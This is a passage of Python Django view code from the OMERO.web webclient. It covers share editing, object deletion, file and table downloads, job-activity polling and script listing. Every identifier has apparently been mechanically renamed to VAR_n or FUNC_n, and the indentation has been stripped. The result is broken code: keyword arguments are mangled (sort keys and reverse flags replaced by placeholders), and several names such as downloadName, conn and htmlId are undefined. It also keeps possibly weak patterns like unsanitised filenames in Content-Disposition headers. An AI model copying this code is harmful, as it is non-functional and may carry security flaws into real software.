elif VAR_27 == "edit":
if VAR_29 is None:
raise Http404("No share ID")
if VAR_28 == "share" and int(VAR_29) > 0:
VAR_54 = "webclient/public/share_form.html"
VAR_104.getMembers(VAR_29)
VAR_104.getComments(VAR_29)
VAR_403 = list(VAR_6.getExperimenters())
VAR_403.sort(VAR_310=lambda x: x.getOmeName().lower())
VAR_115 = {
"message": VAR_104.share.message,
"expiration": "",
"shareMembers": VAR_104.membersInShare,
"enable": VAR_104.share.active,
"experimenters": VAR_403,
}
if VAR_104.share.getExpireDate() is not None:
VAR_115["expiration"] = VAR_104.share.getExpireDate().strftime(
"%Y-%m-%d"
)
VAR_22 = ShareForm(VAR_115=initial) # 'guests':share.guestsInShare,
VAR_53 = {"manager": VAR_104, "form": VAR_22}
elif VAR_27 == "save":
if not VAR_2.method == "POST":
return HttpResponseRedirect(
VAR_350("manage_action_containers", args=["edit", VAR_28, VAR_29])
)
if VAR_28 == "share":
VAR_403 = list(VAR_6.getExperimenters())
VAR_403.sort(VAR_310=lambda x: x.getOmeName().lower())
VAR_22 = ShareForm(
VAR_115={"experimenters": VAR_403}, VAR_158=VAR_2.POST.copy()
)
if VAR_22.is_valid():
VAR_0.debug("Update share: %s" % (VAR_345(VAR_22.cleaned_data)))
VAR_381 = VAR_22.cleaned_data["message"]
VAR_440 = VAR_22.cleaned_data["expiration"]
VAR_64 = VAR_22.cleaned_data["members"]
VAR_441 = VAR_22.cleaned_data["enable"]
VAR_400 = "%s?server=%i" % (
VAR_2.build_absolute_uri(
VAR_350("load_template", args=["public"])
),
int(VAR_6.server_id),
)
VAR_104.updateShareOrDiscussion(
VAR_400, VAR_381, VAR_64, VAR_441, VAR_440
)
VAR_71 = "enable" if VAR_441 else "disable"
return HttpResponse(VAR_71)
else:
VAR_54 = "webclient/public/share_form.html"
VAR_53 = {"share": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "editname":
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_38 = getattr(VAR_104, VAR_28)
VAR_54 = "webclient/ajax_form/container_form_ajax.html"
if VAR_28 == "tag":
VAR_443 = VAR_38.textValue
else:
VAR_443 = VAR_38.getName()
VAR_22 = ContainerNameForm(VAR_115={"name": VAR_443})
VAR_53 = {"manager": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "savename":
if not VAR_2.method == "POST":
return HttpResponseRedirect(
VAR_350("manage_action_containers", args=["edit", VAR_28, VAR_29])
)
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_22 = ContainerNameForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Update VAR_3 VAR_22:" + VAR_345(VAR_22.cleaned_data))
VAR_3 = VAR_22.cleaned_data["name"]
VAR_361 = {"bad": "false", "o_type": VAR_28}
VAR_104.updateName(VAR_28, VAR_3)
return JsonResponse(VAR_361)
else:
VAR_362 = dict()
for e in VAR_22.errors.items():
VAR_362.update({e[0]: unicode(e[1])})
VAR_361 = {"bad": "true", "errs": VAR_362}
return JsonResponse(VAR_361)
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "editdescription":
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_38 = getattr(VAR_104, VAR_28)
VAR_54 = "webclient/ajax_form/container_form_ajax.html"
VAR_22 = ContainerDescriptionForm(VAR_115={"description": VAR_38.description})
VAR_53 = {"manager": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "savedescription":
if not VAR_2.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (VAR_27, VAR_28, VAR_29)
)
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_22 = ContainerDescriptionForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Update VAR_3 VAR_22:" + VAR_345(VAR_22.cleaned_data))
VAR_360 = VAR_22.cleaned_data["description"]
VAR_104.updateDescription(VAR_28, VAR_360)
VAR_361 = {"bad": "false"}
return JsonResponse(VAR_361)
else:
VAR_362 = dict()
for e in VAR_22.errors.items():
VAR_362.update({e[0]: unicode(e[1])})
VAR_361 = {"bad": "true", "errs": VAR_362}
return JsonResponse(VAR_361)
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "remove":
VAR_82 = VAR_2.POST["parent"]
try:
VAR_104.remove(VAR_82.split("|"))
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_361 = {"bad": "true", "errs": VAR_345(x)}
return JsonResponse(VAR_361)
rdict = {"bad": "false"}
return JsonResponse(VAR_361)
elif VAR_27 == "removefromshare":
VAR_257 = VAR_2.POST.get("source")
try:
VAR_104.removeImage(VAR_257)
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_361 = {"bad": "true", "errs": VAR_345(x)}
return JsonResponse(VAR_361)
rdict = {"bad": "false"}
return JsonResponse(VAR_361)
elif VAR_27 == "delete":
VAR_453 = toBoolean(VAR_2.POST.get("child"))
VAR_91 = toBoolean(VAR_2.POST.get("anns"))
try:
VAR_84 = VAR_104.deleteItem(VAR_453, VAR_91)
VAR_2.session["callback"][VAR_345(VAR_84)] = {
"job_type": "delete",
"delmany": False,
"did": VAR_29,
"dtype": VAR_28,
"status": "in progress",
"error": 0,
"dreport": _formatReport(VAR_84),
"start_time": datetime.datetime.now(),
}
VAR_2.session.modified = True
except Exception as x:
VAR_0.error(
"Failed to delete: %r" % {"did": VAR_29, "dtype": VAR_28}, exc_info=True
)
VAR_361 = {"bad": "true", "errs": VAR_345(x)}
else:
VAR_361 = {"bad": "false"}
return JsonResponse(VAR_361)
elif VAR_27 == "deletemany":
VAR_455 = {
"Image": VAR_2.POST.getlist("image"),
"Dataset": VAR_2.POST.getlist("dataset"),
"Project": VAR_2.POST.getlist("project"),
"Annotation": VAR_2.POST.getlist("tag"),
"Screen": VAR_2.POST.getlist("screen"),
"Plate": VAR_2.POST.getlist("plate"),
"Well": VAR_2.POST.getlist("well"),
"PlateAcquisition": VAR_2.POST.getlist("acquisition"),
}
VAR_453 = toBoolean(VAR_2.POST.get("child"))
VAR_91 = toBoolean(VAR_2.POST.get("anns"))
VAR_0.debug(
"Delete many: VAR_453? %s VAR_91? %s VAR_455 %s" % (VAR_453, VAR_91, VAR_455)
)
try:
for VAR_310, VAR_187 in VAR_455.items():
if VAR_187 is not None and len(VAR_187) > 0:
VAR_84 = VAR_104.deleteObjects(VAR_310, VAR_187, VAR_453, VAR_91)
if VAR_310 == "PlateAcquisition":
VAR_310 = "Plate Run" # for nicer user VAR_381
VAR_457 = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
"dreport": _formatReport(VAR_84),
"dtype": VAR_310,
}
if len(VAR_187) > 1:
VAR_457["delmany"] = len(VAR_187)
VAR_457["did"] = VAR_187
else:
VAR_457["delmany"] = False
VAR_457["did"] = VAR_187[0]
VAR_2.session["callback"][VAR_345(VAR_84)] = VAR_457
VAR_2.session.modified = True
except Exception:
VAR_0.error(
"Failed to delete: %r" % {"did": VAR_187, "dtype": VAR_310}, exc_info=True
)
raise
else:
VAR_361 = {"bad": "false"}
return JsonResponse(VAR_361)
VAR_53["template"] = VAR_54
return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_54(VAR_2, VAR_30, VAR_31=False, VAR_6=None, **VAR_7):
VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
VAR_173 = VAR_6.getObject("OriginalFile", VAR_30)
if VAR_173 is None:
return handlerInternalError(
VAR_2, "Original File does not exist (id:%s)." % (VAR_30)
)
VAR_174 = ConnCleaningHttpResponse(VAR_173.getFileInChunks(buf=settings.CHUNK_SIZE))
VAR_174.conn = VAR_6
VAR_175 = VAR_173.mimetype
if VAR_175 == "text/x-python":
VAR_175 = "text/plain" # allows display in browser
VAR_174["Content-Type"] = VAR_175
VAR_174["Content-Length"] = VAR_173.getSize()
if VAR_31:
VAR_300 = VAR_173.name.replace(" ", "_")
VAR_300 = downloadName.replace(",", ".")
VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
return VAR_174
@login_required(doConnectionCleanup=False)
@render_response()
def FUNC_55(VAR_2, VAR_32, VAR_33=None, VAR_6=None, **VAR_7):
VAR_176 = VAR_2.GET.get("query", "*")
VAR_177 = FUNC_0(VAR_2, "offset", 0)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_178 = None
try:
VAR_178 = VAR_350("omero_iviewer_index")
except NoReverseMatch:
pass
VAR_32 = VAR_241(VAR_32)
VAR_173 = VAR_6.getObject("OriginalFile", VAR_32)
if VAR_173 is None:
raise Http404("OriginalFile %s not found" % VAR_32)
VAR_179 = VAR_33 == "csv"
VAR_53 = webgateway_views._table_query(
VAR_2, VAR_32, VAR_6=conn, VAR_176=query, VAR_177=offset, VAR_88=limit, VAR_179=lazy
)
if VAR_53.get("error") or not VAR_53.get("data"):
return JsonResponse(VAR_53)
if VAR_33 == "csv":
VAR_301 = VAR_53.get("data")
def FUNC_88():
VAR_363 = ",".join(VAR_301.get("columns"))
yield VAR_363
for rows in VAR_301.get("lazy_rows"):
yield (
"\n" + "\n".join([",".join([VAR_345(VAR_362) for VAR_362 in VAR_377]) for VAR_377 in rows])
)
VAR_300 = VAR_173.name.replace(" ", "_").replace(",", ".")
VAR_300 = downloadName + ".csv"
VAR_174 = TableClosingHttpResponse(FUNC_88(), content_type="text/csv")
VAR_174.conn = VAR_6
VAR_174.table = VAR_53.get("table")
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
return VAR_174
VAR_53["data"]["name"] = VAR_173.name
VAR_53["data"]["path"] = VAR_173.path
VAR_53["data"]["id"] = VAR_32
VAR_53["meta"]["query"] = VAR_176
if VAR_177 == 0 or VAR_177 / VAR_88 == VAR_177 // VAR_88:
VAR_53["meta"]["page"] = (VAR_177 // VAR_88) + 1 if VAR_177 > 0 else 1
VAR_5 = VAR_350("omero_table", args=[VAR_32])
VAR_53["meta"]["url"] = VAR_5
VAR_5 += "?VAR_88=%s" % VAR_88
if VAR_176 != "*":
VAR_5 += "&VAR_176=%s" % VAR_176
if (VAR_177 + VAR_88) < VAR_53["meta"]["totalCount"]:
VAR_53["meta"]["next"] = VAR_5 + "&VAR_177=%s" % (VAR_177 + VAR_88)
if VAR_177 > 0:
VAR_53["meta"]["prev"] = VAR_5 + "&VAR_177=%s" % (max(0, VAR_177 - VAR_88))
if VAR_33 is None:
VAR_53["template"] = "webclient/annotations/FUNC_55.html"
VAR_53["iviewer_url"] = VAR_178
VAR_302 = VAR_53["data"]["column_types"]
if "ImageColumn" in VAR_302:
VAR_53["image_column_index"] = VAR_302.index("ImageColumn")
if "WellColumn" in VAR_302:
VAR_53["well_column_index"] = VAR_302.index("WellColumn")
if "RoiColumn" in VAR_302:
VAR_53["roi_column_index"] = VAR_302.index("RoiColumn")
for idx, VAR_23 in enumerate(VAR_302):
if VAR_23 in ("DoubleColumn", "LongColumn"):
VAR_404 = VAR_53["data"]["columns"][idx]
VAR_405 = []
for VAR_377 in VAR_53["data"]["rows"]:
if VAR_377[idx]:
VAR_405.append(VAR_377[idx])
if len(VAR_405) > 3:
break
if " " in VAR_404 or len(VAR_405) < 2:
continue
VAR_53["example_column"] = VAR_404
VAR_53["example_min_value"] = min(VAR_405)
VAR_53["example_max_value"] = max(VAR_405)
break
return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_56(VAR_2, VAR_34, VAR_6=None, **VAR_7):
VAR_180 = VAR_6.getObject("FileAnnotation", VAR_34)
if VAR_180 is None:
return handlerInternalError(
VAR_2, "FileAnnotation does not exist (id:%s)." % (VAR_34)
)
VAR_174 = ConnCleaningHttpResponse(VAR_180.getFileInChunks(buf=settings.CHUNK_SIZE))
VAR_174.conn = VAR_6
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Length"] = VAR_180.getFileSize()
VAR_174["Content-Disposition"] = "attachment; filename=%s" % (
VAR_180.getFileName().replace(" ", "_")
)
return VAR_174
@login_required()
def FUNC_57(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is None:
raise Http404("No Image found with ID %s" % VAR_26)
VAR_181 = VAR_142.loadOriginalMetadata()
VAR_182 = ["[Global Metadata]"]
VAR_182.extend(["%s=%s" % (kv[0], kv[1]) for kv in VAR_181[1]])
VAR_182.append("[Series Metadata]")
VAR_182.extend(["%s=%s" % (kv[0], kv[1]) for kv in VAR_181[2]])
VAR_183 = "\n".join(VAR_182)
VAR_174 = HttpResponse(VAR_183)
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Length"] = len(VAR_183)
VAR_174["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
return VAR_174
@login_required()
@render_response()
def FUNC_58(VAR_2, VAR_6=None, **VAR_7):
VAR_184 = VAR_2.GET.get("format", None)
if VAR_184 is not None:
VAR_191 = VAR_350("download_as")
VAR_303 = "Export_as_%s" % VAR_184
else:
VAR_191 = VAR_350("archived_files")
VAR_303 = "OriginalFileDownload"
VAR_185 = VAR_2.GET.get("ids") # E.g. VAR_142-1|VAR_142-2
VAR_186 = VAR_2.GET.get("name", VAR_303) # VAR_4 zip VAR_3
VAR_186 = os.path.basename(VAR_186) # remove VAR_314
if VAR_185 is None:
raise Http404("No IDs specified. E.g. ?VAR_187=VAR_142-1|VAR_142-2")
VAR_187 = VAR_185.split("|")
VAR_188 = []
VAR_189 = 0
VAR_190 = 0
if VAR_184 is None:
VAR_304 = []
VAR_214 = []
for VAR_318 in VAR_187:
if VAR_318.split("-")[0] == "image":
VAR_304.append(VAR_318.split("-")[1])
elif VAR_318.split("-")[0] == "well":
VAR_214.append(VAR_318.split("-")[1])
VAR_106 = []
if VAR_304:
VAR_106 = list(VAR_6.getObjects("Image", VAR_304))
if len(VAR_106) == 0:
raise Http404("No VAR_106 found.")
VAR_305 = set()
VAR_306 = set()
for VAR_142 in VAR_106:
VAR_364 = VAR_142.getFileset()
if VAR_364 is not None:
if VAR_364.id in VAR_305:
continue
VAR_305.add(VAR_364.id)
VAR_284 = list(VAR_142.getImportedImageFiles())
VAR_365 = []
for f in VAR_284:
if f.id in VAR_306:
continue
VAR_306.add(f.id)
VAR_365.append({"id": f.id, "name": f.name, "size": f.getSize()})
VAR_190 += f.getSize()
if len(VAR_365) > 0:
VAR_188.append(VAR_365)
VAR_189 = sum([len(VAR_365) for VAR_365 in VAR_188])
else:
VAR_189 = len(VAR_187)
VAR_176 = "&".join([_id.replace("-", "=") for _id in VAR_187])
VAR_191 = download_url + "?" + VAR_176
if VAR_184 is not None:
VAR_191 = download_url + "&VAR_184=%s" % VAR_184
VAR_53 = {
"template": "webclient/annotations/FUNC_58.html",
"url": VAR_191,
"defaultName": VAR_186,
"fileLists": VAR_188,
"fileCount": VAR_189,
"filesTotalSize": VAR_190,
}
if VAR_190 > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
VAR_53["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_59(VAR_2, VAR_35=None, VAR_36=None, VAR_6=None, **VAR_7):
VAR_54 = "webclient/history/calendar.html"
VAR_192 = VAR_2.session.get("user_id")
if VAR_35 is not None and VAR_36 is not None:
VAR_193 = BaseCalendar(VAR_6=conn, VAR_35=year, VAR_36=month, eid=VAR_192)
else:
VAR_307 = datetime.datetime.today()
VAR_193 = BaseCalendar(
VAR_6=conn, VAR_35=VAR_307.year, VAR_36=VAR_307.month, eid=VAR_192
)
VAR_193.create_calendar()
VAR_53 = {"controller": VAR_193}
VAR_53["template"] = VAR_54
return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_60(VAR_2, VAR_35, VAR_36, VAR_37, VAR_6=None, **VAR_7):
if VAR_35 is None or VAR_36 is None or VAR_37 is None:
raise Http404("Year, VAR_36, and VAR_37 are required")
VAR_54 = "webclient/history/history_details.html"
VAR_87 = int(VAR_2.GET.get("page", 1))
VAR_192 = VAR_2.session.get("user_id")
VAR_193 = BaseCalendar(
VAR_6=conn, VAR_35=year, VAR_36=month, VAR_37=day, eid=VAR_192
)
VAR_193.get_items(VAR_87)
VAR_53 = {"controller": VAR_193}
VAR_53["template"] = VAR_54
return VAR_53
def FUNC_61(VAR_6, VAR_38):
VAR_194 = VAR_350(viewname="load_template", args=["userdata"])
if isinstance(VAR_38, omero.model.FileAnnotationI):
VAR_308 = VAR_6.getObject("Annotation", VAR_38.id.val)
for VAR_255 in ["project", "dataset", "image"]:
VAR_240 = list(VAR_308.getParentLinks(VAR_255))
if len(VAR_240) > 0:
VAR_38 = VAR_240[0].parent
break
if VAR_38.__class__.__name__ in (
"ImageI",
"DatasetI",
"ProjectI",
"ScreenI",
"PlateI",
"WellI",
):
VAR_309 = VAR_38.__class__.__name__[:-1].lower()
VAR_194 += "?VAR_59=%s-%s" % (VAR_309, VAR_38.id.val)
return VAR_194
def FUNC_62(VAR_2, VAR_39, **VAR_7):
for VAR_310, VAR_374 in VAR_7.items():
VAR_2.session["callback"][VAR_39][VAR_310] = VAR_374
@login_required()
@render_response()
def FUNC_63(VAR_2, VAR_6=None, **VAR_7):
VAR_195 = 0
VAR_196 = 0
VAR_197 = []
_purgeCallback(VAR_2)
VAR_198 = VAR_2.GET.get("jobId", None)
if VAR_198 is not None:
VAR_198 = VAR_345(VAR_198)
try:
VAR_366 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
VAR_313 = VAR_366.getStatus()
VAR_0.debug("job VAR_313: %s", VAR_313)
VAR_174 = VAR_366.getResponse()
if VAR_174 is not None:
VAR_172 = graphResponseMarshal(VAR_6, VAR_174)
VAR_172["finished"] = True
else:
VAR_172 = {"finished": False}
VAR_172["status"] = {
"currentStep": VAR_313.currentStep,
"steps": VAR_313.steps,
"startTime": VAR_313.startTime,
"stopTime": VAR_313.stopTime,
}
except IceException:
VAR_172 = {"finished": True}
return VAR_172
elif VAR_2.method == "DELETE":
try:
VAR_17 = json.loads(VAR_2.body)
except TypeError:
VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
VAR_198 = VAR_17.get("jobId", None)
if VAR_198 is not None:
VAR_198 = VAR_345(VAR_198)
VAR_172 = {"jobId": VAR_198}
try:
VAR_366 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
VAR_313 = VAR_366.getStatus()
VAR_0.debug("pre-cancel() job VAR_313: %s", VAR_313)
VAR_172["status"] = {
"currentStep": VAR_313.currentStep,
"steps": VAR_313.steps,
"startTime": VAR_313.startTime,
"stopTime": VAR_313.stopTime,
}
VAR_366.cancel()
except omero.LockTimeout:
VAR_0.info("Timeout on VAR_366.cancel()")
return VAR_172
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_311 = VAR_2.session["callback"][VAR_39]
VAR_312 = VAR_311["job_type"]
VAR_313 = VAR_311["status"]
if VAR_313 == "failed":
VAR_196 += 1
VAR_2.session.modified = True
if VAR_312 in ("chgrp", "chown"):
if VAR_313 not in ("failed", "finished"):
VAR_174 = None
try:
VAR_366 = omero.cmd.HandlePrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
VAR_174 = VAR_366.getResponse()
VAR_429 = False
try:
if VAR_174 is not None:
VAR_429 = True
VAR_197.append(VAR_39)
if isinstance(VAR_174, omero.cmd.ERR):
VAR_445 = ", ".join(
[
"%s: %s" % (VAR_413, VAR_414)
for VAR_413, VAR_414 in VAR_174.parameters.items()
]
)
VAR_0.error(
"%s failed with: %s" % (VAR_312, VAR_445)
)
FUNC_62(
VAR_2,
VAR_39,
VAR_313="failed",
report="%s %s" % (VAR_174.name, VAR_445),
VAR_57=1,
)
elif isinstance(VAR_174, omero.cmd.OK):
FUNC_62(VAR_2, VAR_39, VAR_313="finished")
else:
VAR_195 += 1
finally:
VAR_366.close(VAR_429)
except Exception:
VAR_0.info(
"Activities %s VAR_84 not found: %s" % (VAR_312, VAR_39)
)
continue
elif VAR_312 == "send_email":
if VAR_313 not in ("failed", "finished"):
VAR_174 = None
try:
VAR_366 = omero.cmd.HandlePrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
VAR_442 = omero.callbacks.CmdCallbackI(
VAR_6.c, VAR_366, foreground_poll=True
)
VAR_174 = VAR_442.getResponse()
VAR_429 = False
try:
if VAR_174 is not None:
VAR_429 = True
VAR_197.append(VAR_39)
if isinstance(VAR_174, omero.cmd.ERR):
VAR_445 = ", ".join(
[
"%s: %s" % (VAR_413, VAR_414)
for VAR_413, VAR_414 in VAR_174.parameters.items()
]
)
VAR_0.error("send_email failed with: %s" % VAR_445)
FUNC_62(
VAR_2,
VAR_39,
VAR_313="failed",
report={"error": VAR_445},
VAR_57=1,
)
else:
VAR_448 = (
VAR_174.success
+ len(VAR_174.invalidusers)
+ len(VAR_174.invalidemails)
)
FUNC_62(
VAR_2,
VAR_39,
VAR_313="finished",
VAR_174={"success": VAR_174.success, "total": VAR_448},
)
if (
len(VAR_174.invalidusers) > 0
or len(VAR_174.invalidemails) > 0
):
VAR_451 = [
e.getFullName()
for e in list(
VAR_6.getObjects(
"Experimenter", VAR_174.invalidusers
)
)
]
FUNC_62(
VAR_2,
VAR_39,
report={
"invalidusers": VAR_451,
"invalidemails": VAR_174.invalidemails,
},
)
else:
VAR_195 += 1
finally:
VAR_442.close(VAR_429)
except Exception:
VAR_0.error(traceback.format_exc())
VAR_0.info("Activities send_email VAR_84 not found: %s" % VAR_39)
elif VAR_312 == "delete":
if VAR_313 not in ("failed", "finished"):
try:
VAR_84 = omero.cmd.HandlePrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
VAR_444 = omero.callbacks.CmdCallbackI(
VAR_6.c, VAR_84, foreground_poll=True
)
VAR_174 = VAR_444.getResponse()
VAR_429 = False
try:
if not VAR_174: # Response not available
FUNC_62(
VAR_2,
VAR_39,
VAR_57=0,
VAR_313="in progress",
dreport=_formatReport(VAR_84),
)
VAR_195 += 1
else: # Response available
VAR_429 = True
VAR_197.append(VAR_39)
VAR_174 = VAR_444.getResponse()
VAR_449 = isinstance(VAR_174, omero.cmd.ERR)
if VAR_449:
FUNC_62(
VAR_2,
VAR_39,
VAR_57=1,
VAR_313="failed",
dreport=_formatReport(VAR_84),
)
VAR_196 += 1
else:
FUNC_62(
VAR_2,
VAR_39,
VAR_57=0,
VAR_313="finished",
dreport=_formatReport(VAR_84),
)
finally:
VAR_444.close(VAR_429)
except Ice.ObjectNotExistException:
FUNC_62(
VAR_2, VAR_39, VAR_57=0, VAR_313="finished", dreport=None
)
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_0.error("Status job '%s'error:" % VAR_39)
FUNC_62(
VAR_2, VAR_39, VAR_57=1, VAR_313="failed", dreport=VAR_345(x)
)
VAR_196 += 1
elif VAR_312 == "script":
if not VAR_39.startswith("ProcessCallback"):
continue # ignore
if VAR_313 not in ("failed", "finished"):
VAR_0.info("Check VAR_442 on script: %s" % VAR_39)
try:
VAR_446 = omero.grid.ScriptProcessPrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
except IceException:
FUNC_62(
VAR_2,
VAR_39,
VAR_313="failed",
Message="No process found for job",
VAR_57=1,
)
continue
VAR_444 = omero.scripts.ProcessCallbackI(VAR_6.c, VAR_446)
if VAR_444.block(0): # ms.
VAR_444.close()
try:
VAR_450 = VAR_446.getResults(0, VAR_6.SERVICE_OPTS)
FUNC_62(VAR_2, VAR_39, VAR_313="finished")
VAR_197.append(VAR_39)
except Exception:
FUNC_62(
VAR_2,
VAR_39,
VAR_313="finished",
Message="Failed to FUNC_81 results",
)
VAR_0.info("Failed on VAR_446.getResults() for OMERO.script")
continue
VAR_447 = {}
for VAR_310, VAR_374 in VAR_450.items():
VAR_414 = VAR_374.getValue()
if VAR_310 in ("stdout", "stderr", "Message"):
if VAR_310 in ("stderr", "stdout"):
VAR_414 = VAR_414.id.val
VAR_452 = {VAR_310: VAR_414}
FUNC_62(VAR_2, VAR_39, **VAR_452)
else:
if hasattr(VAR_414, "id"):
VAR_454 = {
"id": VAR_414.id.val,
"type": VAR_414.__class__.__name__[:-1],
}
VAR_454["browse_url"] = FUNC_61(VAR_6, VAR_414)
if VAR_414.isLoaded() and hasattr(VAR_414, "file"):
VAR_456 = {
"image/png": "png",
"image/jpeg": "jpeg",
"text/plain": "text",
}
if VAR_414.file.mimetype.val in VAR_456:
VAR_454["fileType"] = VAR_456[
VAR_414.file.mimetype.val
]
VAR_454["fileId"] = VAR_414.file.id.val
VAR_454["name"] = VAR_414.file.name.val
if VAR_414.isLoaded() and hasattr(VAR_414, "name"):
VAR_3 = unwrap(VAR_414.name)
if VAR_3 is not None:
VAR_454["name"] = VAR_3
VAR_447[VAR_310] = VAR_454
else:
VAR_447[VAR_310] = unwrap(VAR_414)
FUNC_62(VAR_2, VAR_39, VAR_450=VAR_447)
else:
VAR_195 += 1
VAR_172 = {}
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_172[VAR_39] = copy.copy(VAR_2.session["callback"][VAR_39])
if "template" in VAR_7 and VAR_7["template"] == "json":
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_172[VAR_39]["start_time"] = VAR_345(
VAR_2.session["callback"][VAR_39]["start_time"]
)
VAR_172["inprogress"] = VAR_195
VAR_172["failure"] = VAR_196
VAR_172["jobs"] = len(VAR_2.session["callback"])
return JsonResponse(VAR_172) # json
VAR_199 = []
VAR_200 = False
for VAR_310, VAR_158 in VAR_172.items():
if len(VAR_310.split(" ")) > 0:
VAR_367 = VAR_310.split(" ")[0]
if len(VAR_367.split("/")) > 1:
VAR_367 = htmlId.split("/")[1]
VAR_172[VAR_310]["id"] = VAR_367
VAR_172[VAR_310]["key"] = VAR_310
if VAR_310 in VAR_197:
VAR_172[VAR_310]["new"] = True
if "error" in VAR_158 and VAR_158["error"] > 0:
VAR_200 = True
VAR_199.append(VAR_172[VAR_310])
VAR_199.sort(VAR_310=lambda x: x["start_time"], VAR_350=True)
VAR_53 = {
"sizeOfJobs": len(VAR_2.session["callback"]),
"jobs": VAR_199,
"inprogress": VAR_195,
"new_results": len(VAR_197),
"new_errors": VAR_200,
"failure": VAR_196,
}
VAR_53["template"] = "webclient/FUNC_63/activitiesContent.html"
return VAR_53
@login_required()
def FUNC_64(VAR_2, VAR_27, **VAR_7):
VAR_2.session.modified = True
if VAR_27 == "clean":
if "jobKey" in VAR_2.POST:
VAR_198 = VAR_2.POST.get("jobKey")
VAR_172 = {}
if VAR_198 in VAR_2.session["callback"]:
del VAR_2.session["callback"][VAR_198]
VAR_2.session.modified = True
VAR_172["removed"] = True
else:
VAR_172["removed"] = False
return JsonResponse(VAR_172)
else:
VAR_199 = list(VAR_2.session["callback"].items())
for VAR_310, VAR_158 in VAR_199:
if VAR_158["status"] != "in progress":
del VAR_2.session["callback"][VAR_310]
return HttpResponse("OK")
@login_required()
def FUNC_65(VAR_2, VAR_40=None, VAR_6=None, **VAR_7):
VAR_201 = VAR_6.getExperimenterPhoto(VAR_40)
return HttpResponse(VAR_201, content_type="image/jpeg")
@login_required()
def FUNC_66(VAR_2, VAR_41, VAR_25=None, **VAR_7):
VAR_7["viewport_server"] = (
VAR_25 is not None and VAR_350("webindex") + VAR_25 or VAR_350("webindex")
)
VAR_7["viewport_server"] = VAR_7["viewport_server"].rstrip("/")
return webgateway_views.full_viewer(VAR_2, VAR_41, **VAR_7)
@login_required()
@render_response()
def FUNC_67(VAR_2, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_203 = VAR_202.getScripts()
VAR_204 = {}
VAR_205 = (
VAR_2.session.get("server_settings", {})
.get("scripts_to_ignore", "")
.split(",")
)
for s in VAR_203:
VAR_42 = s.id.val
VAR_314 = s.path.val
VAR_3 = s.name.val
VAR_315 = os.path.join(VAR_314, VAR_3)
if VAR_315 in VAR_205:
VAR_0.info("Ignoring script %r" % VAR_315)
continue
ul = VAR_204
VAR_316 = VAR_315.split(os.path.sep)
for li, VAR_362 in enumerate(VAR_316):
if len(VAR_362) == 0:
continue
if VAR_362 not in VAR_206:
if li + 1 == len(VAR_316):
VAR_206[VAR_362] = VAR_42
else:
VAR_206[VAR_362] = {}
VAR_206 = ul[VAR_362]
def FUNC_85(VAR_206):
VAR_317 = []
for VAR_3, VAR_374 in VAR_206.items():
if isinstance(VAR_374, dict):
VAR_317.append({"name": VAR_3, "ul": FUNC_85(VAR_374)})
else:
VAR_317.append({"name": VAR_3, "id": VAR_374})
VAR_317.sort(VAR_310=lambda x: x["name"].lower())
return VAR_317
VAR_207 = FUNC_85(VAR_204)
if not VAR_2.GET.get("full_path") and len(VAR_207) == 1:
VAR_207 = scriptList[0]["ul"]
return VAR_207
@login_required()
@render_response()
def FUNC_68(VAR_2, VAR_42, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
try:
VAR_73 = VAR_202.getParams(VAR_241(VAR_42))
except Exception as ex:
if ex.message.lower().startswith("no processor available"):
return {
"template": "webclient/VAR_203/no_processor.html",
"scriptId": VAR_42,
}
raise ex
if VAR_73 is None:
return HttpResponse()
VAR_208 = {}
VAR_208["id"] = VAR_241(VAR_42)
VAR_208["name"] = VAR_73.name.replace("_", " ")
VAR_208["description"] = VAR_73.description
VAR_208["authors"] = ", ".join([a for a in VAR_73.authors])
VAR_208["contact"] = VAR_73.contact
VAR_208["version"] = VAR_73.version
